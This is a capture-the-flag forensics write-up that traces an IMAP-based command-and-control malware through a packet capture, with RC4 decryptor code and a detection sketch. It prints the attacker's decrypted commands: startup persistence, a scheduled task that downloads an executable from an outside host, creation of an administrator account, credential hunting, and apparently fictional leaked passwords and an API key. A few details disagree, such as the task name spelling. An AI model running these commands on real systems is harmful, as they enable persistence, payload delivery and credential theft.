# Silent Trap

## Understanding the Setting

This forensics challenge was indeed challenging, but definitely fun. We start off with a .pcap file.

The first request that caught my eye was an HTTP request to this URL: <http://mail.korptech.net/mail/?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=&_remote=1&_unlock=loading1740159000898&_=1740159000129>

In the POST body was JSON data that revealed valuable initial information about the captured traffic:

<figure><img src="/files/Bpo9wqTkWMHdh9d58iSQ" alt=""><figcaption><p>JSON Mail Data</p></figcaption></figure>

Reading through more of the HTTP requests, it becomes clear that a webmail client was in use. In Wireshark you can extract files from the data streams via "File > Export Objects > HTTP". I did that to inspect the HTML files that were transmitted:

<figure><img src="/files/droPvH8ezK7FgLscdgox" alt=""><figcaption><p>HTTP Stream 4.1</p></figcaption></figure>

<figure><img src="/files/gS58eGmr7JoHnuSWhorj" alt=""><figcaption><p>HTTP Stream 8.2</p></figcaption></figure>

From this we already learned a lot about the setting, and we even found a password for a file. With the same method as for the HTML files, I found and extracted the zip file, which can be opened with the password just obtained.

```
7z x 1.zip
```

The result was the executable file "Eldoria\_Balance\_Issue\_Report.pdf.exe". This was most likely used to compromise the target. Inspecting the traffic that carries the malicious file, we find that <proplayer@email.com> must be the attacker, since that address sent the mail with the malware. 192.168.91.133 appears to be the server "mail.korptech.net".

At some point I noticed that "APPEND Inbox" commands were being sent over IMAP at regular intervals. Each one looked like this:

```
$ APPEND Inbox {384}
From: dev-support
Subject: 2/21/2025 5:31:40 PM_report_U1VQUE9SVEhVQl9kZXYtc3VwcG9ydF9NaWNyb3NvZnQgV2luZG93cyBOVCA2LjIuOTIwMC4w

VGiPTdHXQGP876EbMX2FJhm3ZazpvA8aO8jT1uC8xPhDZq/Np5oZQnHUpKxc36FHBznusaFRsSPtnJzlC4qyGNxcWMCIs1qdVzygFbDj0se4vntsvpU9rKvQPLcPERIjLB36+ws5PVmzVsnuxNmgUPegSj+VPrRfrcHkaE0PKHVKjXgoGdmRJd2PDG7SWRcBDwNp8EC7UfDTqZp7EDWJYUJuBLfFYh4tpc/MCfKw++nXu5YZ/FWE9pkrWq4=
```

The body base64-decodes only to unreadable binary and appeared to be encrypted. In between these suspicious requests, someone repeatedly searches for the mail subject `U1VQUE9SVEhVQl9kZXYtc3VwcG9ydF9NaWNyb3NvZnQgV2luZG93cyBOVCA2LjIuOTIwMC4w`, which base64-decodes to "SUPPORTHUB\_dev-support\_Microsoft Windows NT 6.2.9200.0".

The suspicious encrypted data could be exported the same way as before. The files are in EML format.

<figure><img src="/files/kPPooQMCF5mdPrAiF6nm" alt=""><figcaption><p>Suspicious EML Data Download</p></figcaption></figure>

The attacker sent numerous mails with the same subject. Some contact data has been fetched as well:

<figure><img src="/files/kFFbB0d7N9uheN7GY4Br" alt=""><figcaption><p>Mail Contact Data</p></figcaption></figure>

Inspecting the file in Ghidra and doing a string search, it became clear that the malware either exfiltrates data over mail or acts as a C2 agent via IMAP. The data is encrypted, as we have seen.

<figure><img src="/files/aK3LNWGaN7SnpY1dZh40" alt=""><figcaption><p>Ghidra Strings</p></figcaption></figure>

## Creating a Decryptor

Opening the malware in a Windows VM in ILSpy let me see the actual code, which revealed the encryption function and password for the encrypted data that it sends via IMAP.

<figure><img src="/files/QWSigmiVbGnkNewXQvC9" alt=""><figcaption><p>ILSpy Malware Inspection</p></figcaption></figure>

<figure><img src="/files/3ulGbcxuAPxo5T9JoS8N" alt=""><figcaption><p>ILSpy Malware Inspection</p></figcaption></figure>

<figure><img src="/files/WN5mksi1arBWwYOCSTKt" alt=""><figcaption><p>ILSpy Malware Inspection</p></figcaption></figure>

The last screenshot shows the encryption password, which was random binary data. I converted it to base64:

`qHOu1ajeSCRb0fKARWPDpO62Q1wHeaRWeQpdBIxv+CweXjA2LWS4NhxSybzLlnuj5YqxM6ToVpqzj5AWhgwo8zcCSWdj8+x3CXj3GYSJQ0Jv8GxWVT8sMfEGA6qDljUxfkg8JJD4Nwrx0KPZMZrO4xljEpCGqe1kdRYLlp3mrSZIY4Ee3HDiOBByhRZgAVpIoiaPuiOOgOrE74ayzeV54fbozez+mJFifh3ZSrGOE762l+mdTEpom09zBRLMQf7MdkdcITpwzpdnsxik22JRBvFk5L5gjIABofbsGT5kV5G5LT2PNAjjIOklt2VZGH3L4wmSnNDOwobCF+lkJp46nw==`

I also concatenated all of the encrypted strings from the extracted eml files, assuming that the encryptor uses a stream cipher:

`bmmDXtPNDyr4vZ8EbWCfVNLNXHGo4IBubIVcntVJYKiokwZ/WoshHv5RlKCKGQA31JqXpPubuF4X`\
`8I3U3VQ/Dc+wzyWDowJLEeOdvWpihEvf10R2qOCVADp4njRKuEqUrJ0FHTfOgYi++463Bjbwl7Kb`\
`WARpwYnOIZKwHU8R6779W7opq8X53gGbtwPHUkL5iLEd3m9wjkyy68bc7OAYcbaLObC5lRH3dHR0`\
`TEJww8wqOT5fikHYuMT/p0mnp0w/uQnrA+nC/G9dFSV+QoF3TGHPyjbCjVFs00kCchwKbuReokfy`\
`0OuAGnlN6A0KUzqlzHEAX6TS3wvnrOf8mOStMMx2nvGIZGmqe6wQoKZSWORO4YjgjYy3VgF7s2nc`\
`Os+lTlCSGPweehEXiNAlWTX6oEARxIi2yHdkmB/L10p3qKuTBCxsmiEF5UrLrJ48ACfRw5W0stu3`\
`Fjt3ZJgf0stMZOSohB0qacoQDvpXlOW9CAE10pyVo7KQswQs6oni214CeMPWwDKTd2SYH9LLTGTk`\
`qIQdKmnKEA76V5TlvQgBNdKclaOykLMELOqJ4tteAnjD1sAyk2tkix/P0Up38e++ORNUyn4MtxyK`\
`7b0PBDvUl8XwvYD2IBrYpsHuDFk6fWieH/2ecyWnvNZdPTmWcQz+UJ7/ug5TdtaSlKPlm6QWfX1o`\
`nh/9nnMlp7zWXT05lnEM/lCe/7oOU3bWkpSj5ZukFn10bp5anoZsP9SahRctarY1D+ETifm+DBwm`\
`0q+moOKwtwY+w7X9100aFaGLwCCSkQFBAPCzoVueDvmJysNJurAY2U5J27uIB9hkcIhUtuvp9bSu`\
`LXy1ojmqvOlrxXJ6bFoYSNTKC3I7UpsQdG6eWp7nFVnqrpUZKmmZDQnlW57poAgaNcqAyaTqgA==`

The algorithm used for encryption is RC4, which I found out by asking an LLM about it. Shame on me. I created a Python decryptor:

```python
import base64
from Crypto.Cipher import ARC4  # pycryptodome

def decode_files(files, base64_passphrase):
    passphrase = base64.b64decode(base64_passphrase)
    # One cipher object for all files: RC4 is a stream cipher, so the keystream
    # simply continues from one file to the next, matching the concatenation above.
    cipher = ARC4.new(passphrase)

    for file in files:
        with open(file, 'r') as f:
            # join the lines so wrapped base64 (as in the .eml bodies) decodes cleanly
            base64_data = "".join(f.read().split())
            encrypted_data = base64.b64decode(base64_data)
            decrypted_data = cipher.decrypt(encrypted_data)
            # 'replace' keeps going if a chunk does not decrypt to valid UTF-8
            print("\n" + decrypted_data.decode('utf-8', errors='replace'))

# Example usage: the exported .eml files in the order they were captured
file_list = ['0.eml','1.eml','2.eml','3.eml','4.eml','5.eml','6.eml','7.eml','8.eml','9.eml','a.eml','b.eml']
base64_password = 'qHOu1ajeSCRb0fKARWPDpO62Q1wHeaRWeQpdBIxv+CweXjA2LWS4NhxSybzLlnuj5YqxM6ToVpqzj5AWhgwo8zcCSWdj8+x3CXj3GYSJQ0Jv8GxWVT8sMfEGA6qDljUxfkg8JJD4Nwrx0KPZMZrO4xljEpCGqe1kdRYLlp3mrSZIY4Ee3HDiOBByhRZgAVpIoiaPuiOOgOrE74ayzeV54fbozez+mJFifh3ZSrGOE762l+mdTEpom09zBRLMQf7MdkdcITpwzpdnsxik22JRBvFk5L5gjIABofbsGT5kV5G5LT2PNAjjIOklt2VZGH3L4wmSnNDOwobCF+lkJp46nw=='
decode_files(file_list, base64_password)
```
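As an added example (my own code, not the decryptor above and not the malware's implementation), here is a pure-Python version of the same workflow that needs no pycryptodome: a textbook RC4 keystream checked against two published test vectors, a parser that takes one `APPEND Inbox {N}` literal apart (headers, the base64 host tag in the subject, the body), and a decryptor that can run either with one continuous keystream across all messages, as the script above does, or re-keyed for every message. The key and the three command outputs are constructed for the demo; the host tag is the one the captured subject line decodes to. Feeding the per-message sample through continuous mode reproduces a symptom worth recognising when a decryptor misbehaves: only the first message comes out clean.

```python
import base64
import re


def rc4_keystream(key: bytes):
    """Textbook RC4: key scheduling, then an endless PRGA generator."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4_apply(data: bytes, ks) -> bytes:
    """XOR data with the next len(data) keystream bytes; ks keeps its position afterwards."""
    return bytes(b ^ next(ks) for b in data)


def rc4_selftest() -> bool:
    """Two published RC4 test vectors (key, plaintext, ciphertext hex)."""
    cases = [(b"Key", b"Plaintext", "bbf316e8d940af0ad3"),
             (b"Wiki", b"pedia", "1021bf0420")]
    return all(rc4_apply(p, rc4_keystream(k)).hex() == c for k, p, c in cases)


APPEND_RE = re.compile(r"APPEND Inbox \{(\d+)\}\r?\n(.*?)\r?\n\r?\n(.*)", re.S)


def parse_append(literal: str) -> dict:
    """Split one 'APPEND Inbox {N}' literal into headers, decoded host tag and raw body."""
    m = APPEND_RE.search(literal.strip())
    if not m:
        raise ValueError("not an APPEND Inbox literal")
    headers = dict(line.split(": ", 1) for line in m.group(2).splitlines())
    # Subject is '<timestamp>_report_<base64 tag>'; the tag identifies the infected host
    tag_b64 = headers["Subject"].rsplit("_report_", 1)[1]
    return {
        "headers": headers,
        "host_tag": base64.b64decode(tag_b64).decode(),
        "body": base64.b64decode("".join(m.group(3).split())),
    }


def decrypt_appends(literals, key: bytes, continuous: bool):
    """Decrypt the bodies of several APPEND literals.

    continuous=True  reuses one keystream for all messages (what the script above does).
    continuous=False restarts RC4 for every message.
    With the wrong choice only the first message decrypts cleanly.
    """
    ks = rc4_keystream(key)
    out = []
    for lit in literals:
        if not continuous:
            ks = rc4_keystream(key)
        out.append(rc4_apply(parse_append(lit)["body"], ks).decode("utf-8", "replace"))
    return out


def build_append(plain: bytes, ks, host_tag: str, stamp: str) -> str:
    """Constructed helper: forge an APPEND literal in the captured format for the demo."""
    subject = stamp + "_report_" + base64.b64encode(host_tag.encode()).decode()
    msg = "From: dev-support\nSubject: " + subject + "\n\n" + base64.b64encode(rc4_apply(plain, ks)).decode()
    return "$ APPEND Inbox {" + str(len(msg)) + "}\n" + msg


# Constructed demo data: made-up key and command outputs (not the challenge's);
# the host tag is the one the captured subject line decodes to.
DEMO_KEY = bytes(range(0x10, 0x30))
DEMO_TAG = "SUPPORTHUB_dev-support_Microsoft Windows NT 6.2.9200.0"
DEMO_PLAIN = [b"C:\\>whoami\r\nlab\\dev-support\r\n",
              b"C:\\>hostname\r\nLAB-PC\r\n",
              b"C:\\>echo done\r\ndone\r\n"]
_ks = rc4_keystream(DEMO_KEY)
DEMO_CONTINUOUS = [build_append(p, _ks, DEMO_TAG, "2/21/2025 5:3%d:00 PM" % n)
                   for n, p in enumerate(DEMO_PLAIN)]
DEMO_PER_MESSAGE = [build_append(p, rc4_keystream(DEMO_KEY), DEMO_TAG, "2/21/2025 5:3%d:00 PM" % n)
                    for n, p in enumerate(DEMO_PLAIN)]

if __name__ == "__main__":
    print("RC4 self-test:", rc4_selftest())
    print("host tag:", parse_append(DEMO_CONTINUOUS[0])["host_tag"])
    for name, lits in (("continuous", DEMO_CONTINUOUS), ("per-message", DEMO_PER_MESSAGE)):
        for mode in (True, False):
            print(name, "sample, continuous =", mode, decrypt_appends(lits, DEMO_KEY, mode))
```

When real captures are involved, try both modes before concluding that the key or the message order is wrong: a single message decrypting cleanly while the rest are garbage points at a keystream offset problem, not at the key.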

## Results

From everything we know, we can conclude that the malware is a C2 tool that operates over mail. The attacker places an encrypted cmd command in the Drafts folder; the tool waits for it, reads it, decrypts and executes it, and puts the result back in the folder (RC4 encrypted as well).

The decryptor did not work at first: it only decrypted the first command. The reason was that the extracted mails came from the wrong stream. Looking at the suspected C2 communication again, this Wireshark filter selects exactly the requests that we can decrypt with the Python script:

`_ws.col.contains "Request: $ APPEND Inbox"`

<figure><img src="/files/JYu3IFJE9cN7Zuwt1vcz" alt=""><figcaption><p>Wireshark Filter</p></figcaption></figure>
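The pattern described above, a client that keeps searching for one fixed subject and periodically APPENDs a body that is nothing but base64, is something a mail-server log review can flag without knowing the key. The following is an added detection sketch of mine, not part of the writeup: it runs over a constructed IMAP command log with made-up client addresses (the subject tag is the one from the capture, and `OPAQUE` is constructed pseudo-random data standing in for an encrypted body), and reports subjects searched repeatedly at a steady interval plus APPEND bodies that are pure base64 decoding to high-entropy bytes.

```python
import base64
import binascii
import math
import re
from collections import defaultdict
from statistics import pstdev

SEARCH_RE = re.compile(r'^\S+ (?:UID )?SEARCH SUBJECT "([^"]+)"', re.I)
APPEND_RE = re.compile(r'^\S+ APPEND (\S+) \{\d+\}\n', re.I)
B64_RE = re.compile(r'^[A-Za-z0-9+/]+={0,2}$')


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: encrypted or random data sits high, readable text around 4-5."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def opaque_append(cmd: str, min_entropy: float = 5.5) -> bool:
    """True if an APPEND carries a body that is nothing but base64 decoding to high-entropy bytes."""
    cmd = cmd.replace("\r\n", "\n")
    if not APPEND_RE.match(cmd) or "\n\n" not in cmd:
        return False
    body = "".join(cmd.split("\n\n", 1)[1].split())  # un-wrap the base64 lines
    if not B64_RE.match(body):
        return False
    try:
        raw = base64.b64decode(body, validate=True)
    except binascii.Error:
        return False
    return shannon_entropy(raw) >= min_entropy


def beacon_searches(log, min_count: int = 3, max_jitter: float = 5.0) -> dict:
    """(client, subject) pairs searched at least min_count times at a near-constant interval."""
    times = defaultdict(list)
    for ts, client, cmd in log:
        m = SEARCH_RE.match(cmd)
        if m:
            times[(client, m.group(1))].append(ts)
    hits = {}
    for key, ts_list in times.items():
        if len(ts_list) < min_count:
            continue
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        if pstdev(gaps) <= max_jitter:
            hits[key] = len(ts_list)
    return hits


def find_suspicious(log) -> list:
    """Combine both heuristics into human-readable findings."""
    findings = ["beacon: %s searched subject %r %d times at a steady interval" % (c, s, n)
                for (c, s), n in beacon_searches(log).items()]
    for ts, client, cmd in log:
        if opaque_append(cmd):
            folder = APPEND_RE.match(cmd.replace("\r\n", "\n")).group(1)
            findings.append("opaque APPEND to %s from %s at t=%d" % (folder, client, ts))
    return findings


def append_cmd(tag: str, folder: str, headers: str, body: str) -> str:
    """Constructed helper that formats an APPEND literal the way the capture shows it."""
    msg = headers + "\n\n" + body
    return "%s APPEND %s {%d}\n%s" % (tag, folder, len(msg), msg)


# Constructed IMAP command log (seconds, client address, command): the clients are made up,
# the subject tag is the one from the capture, OPAQUE stands in for an encrypted body.
TAG = "U1VQUE9SVEhVQl9kZXYtc3VwcG9ydF9NaWNyb3NvZnQgV2luZG93cyBOVCA2LjIuOTIwMC4w"
OPAQUE = base64.b64encode(bytes((i * 73 + 11) & 0xFF for i in range(96))).decode()
APPEND_BOT = append_cmd("$", "Inbox", "From: dev-support\nSubject: 2/21/2025 5:31:40 PM_report_" + TAG, OPAQUE)
APPEND_HUMAN = append_cmd("b3", "Drafts", "From: alice\nSubject: Re: Game Crash on Level 5",
                          "Thanks, looking into it now.")
DEMO_LOG = [
    (0, "10.0.0.5", '$ SEARCH SUBJECT "' + TAG + '"'),
    (5, "10.0.0.7", "b1 SELECT INBOX"),
    (30, "10.0.0.5", '$ SEARCH SUBJECT "' + TAG + '"'),
    (40, "10.0.0.7", 'b2 SEARCH SUBJECT "Level 5"'),
    (60, "10.0.0.5", '$ SEARCH SUBJECT "' + TAG + '"'),
    (61, "10.0.0.5", APPEND_BOT),
    (75, "10.0.0.7", APPEND_HUMAN),
    (90, "10.0.0.5", '$ SEARCH SUBJECT "' + TAG + '"'),
]

if __name__ == "__main__":
    for line in find_suspicious(DEMO_LOG):
        print(line)
```

Base64-encoded attachments in legitimate mail also decode to high-entropy bytes, so the APPEND heuristic on its own is a triage signal, not an alert; the same client beaconing on one fixed subject and then appending opaque bodies is the combination worth escalating.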

After RC4 decryption with the password extracted from the malware, the bodies of the APPEND IMAP commands contain the commands together with their output. These are the commands; note that I removed some of the command output since it was extremely large:

{% code overflow="wrap" %}

```powershell
C:\Users\dev-support\Desktop>move /Y email.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\email.exe"


C:\Users\dev-support\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled


C:\Users\dev-support\Desktop>tasklist /v

Image Name                     PID Session Name        Session#    Mem Usage Status          User Name                                              CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process              0 Services                   0          8 K Unknown         NT AUTHORITY\SYSTEM                                    15:15:22 N/A
System                           4 Services                   0        144 K Unknown         N/A                                                     0:02:00 N/A
Registry                        92 Services                   0     42,860 K Unknown         N/A               
<SNIP>


C:\Users\dev-support\Desktop>schtasks /create /tn Synchronization /tr "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri https://www.mediafire.com/view/wlq9mlfrl0nlcuk/rakalam.exe/file -OutFile C:\Temp\rakalam.exe" /sc minute /mo 1 /ru SYSTEM


C:\Users\dev-support\Desktop>net user devsupport1 P@ssw0rd /add


C:\Users\dev-support\Desktop>net localgroup Administrators devsupport1 /add


C:\Users\dev-support\Desktop>net localgroup Administrators devsupport1 /add


C:\Users\dev-support\Desktop>reg query HKLM /f "password" /t REG_SZ /s


HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fafd998-c8e8-42a1-86d7-7c10c664a415}
    (Default)    REG_SZ    Picture Password Enrollment UX
<SNIP>


C:\Users\dev-support\Desktop>dir C:\ /s /b | findstr "password"
C:\Users\dev-support\AppData\Local\BraveSoftware\Brave-Browser\User Data\ZxcvbnData\3\passwords.txt
<SNIP>


C:\Users\dev-support\Desktop>more "C:\Users\dev-support\AppData\Local\BraveSoftware\Brave-Browser\User Data\ZxcvbnData\3\passwords.txt"
123456
password
<SNIP>


C:\Users\dev-support\Desktop>more C:\backups\credentials.txt
[Database Server]
host=db.internal.korptech.net
username=dbadmin
password=rY?ZY_65P4V0

[Game API]
host=api.korptech.net
api_key=sk-3498fwe09r8fw3f98fw9832fw

[SSH Access]
host=dev-build.korptech.net
username=devops
password=BuildServer@92|7Gy1lz'Xb
port=2022
```

{% endcode %}

Now we can see what the attacker did: he enumerated privileges, exfiltrated browser, database and mail passwords and more, and at the end exfiltrated a secret API key for the game. With that, we can answer all the questions required to solve the challenge:

## Flag Questions

**What is the subject of the first email that the victim opened and replied to?**

Game Crash on Level 5 - Found by extracting HTTP stream 4

**On what date and time was the suspicious email sent? (Format: YYYY-MM-DD\_HH:MM) (for example: 1945-04-30\_12:34)**

2025-02-24\_15:46 - Found by extracting HTTP stream 8

**What is the MD5 hash of the malware file?**

c0b37994963cc0aadd6e78a256c51547 - Extracted the zip file from the HTTP contents, unzipped it with the password from the mail in HTTP stream 8 and used **md5sum Eldoria\_Balance\_Issue\_Report.pdf.exe**

**What credentials were used to log into the attacker's mailbox? (Format: username:password)**

<proplayer@email.com>:completed - Found in an unauthenticated IMAP login when searching for <proplayer@email.com>

**What is the name of the task scheduled by the attacker?**

Synchronisation - This can be found by analyzing the malware, extracting the password and RC4-decrypting all APPEND IMAP data

**What is the API key leaked from the highly valuable file discovered by the attacker?**

sk-3498fwe09r8fw3f98fw9832fw
